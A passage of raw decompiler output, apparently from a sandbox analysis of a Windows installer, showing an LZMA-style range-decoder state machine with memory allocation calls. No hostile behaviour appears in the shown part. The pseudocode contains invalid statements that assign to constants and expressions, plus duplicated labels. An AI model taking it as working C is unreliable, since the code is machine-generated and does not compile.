						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
